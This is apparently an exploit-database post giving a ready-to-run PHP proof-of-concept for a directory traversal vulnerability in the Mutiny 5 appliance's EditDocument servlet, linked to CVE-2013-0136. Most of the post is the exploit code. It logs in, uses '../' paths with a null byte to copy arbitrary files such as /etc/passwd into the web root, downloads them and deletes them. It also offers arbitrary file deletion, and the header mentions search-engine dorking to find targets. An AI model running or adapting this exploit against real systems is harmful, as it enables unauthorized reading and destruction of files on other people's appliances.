=============================================================================================================================================
| # Title     : Mutiny 5.0-1.07 directory traversal Vulnerability                                                                           |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.mutiny.com/downloads/                                                                                           |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The code is an exploit written in PHP that targets a vulnerability in the Mutiny 5 Appliance, 

    allowing an authenticated attacker (i.e. with a username and password) to read or delete any file on the system due to a Directory Traversal vulnerability in the EditDocument servlet.
   
   (Related : https://packetstorm.news/files/id/180894/ Linked CVE numbers:	CVE-2013-0136 ) .
	
[+] save code as poc.php.

[+] Set taget : Line 110.

[+] USage : php poc.php 

[+] PayLoad :

<?php

class MutinyExploit {
    private $target;
    private $username;
    private $password;
    private $session;

    public function __construct($target, $username, $password) {
        $this->target = rtrim($target, '/');
        $this->username = $username;
        $this->password = $password;
    }

    private function sendRequest($url, $postFields = null, $cookie = null) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        if ($postFields) {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
        }

        if ($cookie) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: $cookie"]);
        }

        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    public function login() {
        // الحصول على JSESSIONID الأولي
        $response = $this->sendRequest("{$this->target}/interface/index.do");
        if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {
            $firstSession = $matches[1];
        } else {
            die("فشل في الحصول على JSESSIONID الأولي\n");
        }

        // محاولة تسجيل الدخول
        $postFields = "j_username={$this->username}&j_password={$this->password}";
        $response = $this->sendRequest("{$this->target}/interface/j_security_check", $postFields, "JSESSIONID=$firstSession");

        // التحقق مما إذا كان تسجيل الدخول ناجحًا
        if (strpos($response, "interface/index.do") === false) {
            die("فشل تسجيل الدخول، تحقق من بيانات الاعتماد\n");
        }

        // الحصول على JSESSIONID النهائي بعد المصادقة
        $response = $this->sendRequest("{$this->target}/interface/index.do", null, "JSESSIONID=$firstSession");
        if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {
            $this->session = $matches[1];
            echo "تم تسجيل الدخول بنجاح\n";
        } else {
            die("فشل في الحصول على الجلسة بعد تسجيل الدخول\n");
        }
    }

    public function readFile($filePath) {
        echo "نسخ الملف إلى موقع ويب يمكن الوصول إليه...\n";
        $dstPath = "/usr/jakarta/tomcat/webapps/ROOT/m/";
        $postFields = [
            'operation' => 'COPY',
            'paths[]' => "../../../../{$filePath}%00.txt",
            'newPath' => "../../../..{$dstPath}"
        ];

        $response = $this->sendRequest("{$this->target}/interface/EditDocument", $postFields, "JSESSIONID={$this->session}");
        if (strpos($response, '{"success":true}') !== false) {
            echo "تم نسخ الملف إلى {$dstPath} بنجاح\n";
        } else {
            die("فشل في نسخ الملف\n");
        }

        // قراءة الملف
        echo "استرجاع محتوى الملف...\n";
        $fileContents = $this->sendRequest("{$this->target}/m/" . basename($filePath));
        if ($fileContents) {
            file_put_contents("extracted_" . basename($filePath), $fileContents);
            echo "تم استرجاع الملف وحفظه محليًا\n";
        } else {
            echo "فشل في استرجاع محتوى الملف\n";
        }

        // تنظيف الملفات بعد القراءة
        $this->deleteFile("{$dstPath}" . basename($filePath));
    }

    public function deleteFile($filePath) {
        echo "حذف الملف {$filePath}\n";
        $postFields = [
            'operation' => 'DELETE',
            'paths[]' => "../../../../{$filePath}"
        ];

        $response = $this->sendRequest("{$this->target}/interface/EditDocument", $postFields, "JSESSIONID={$this->session}");
        if (strpos($response, '{"success":true}') !== false) {
            echo "تم حذف الملف بنجاح\n";
        } else {
            echo "فشل في حذف الملف\n";
        }
    }
}

// استخدام الكود
$exploit = new MutinyExploit("http://target.com", "superadmin@mutiny.com", "password");
$exploit->login();
$exploit->readFile("/etc/passwd"); // مثال على قراءة ملف
// $exploit->deleteFile("/tmp/test.txt"); // حذف ملف (اختياري)

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================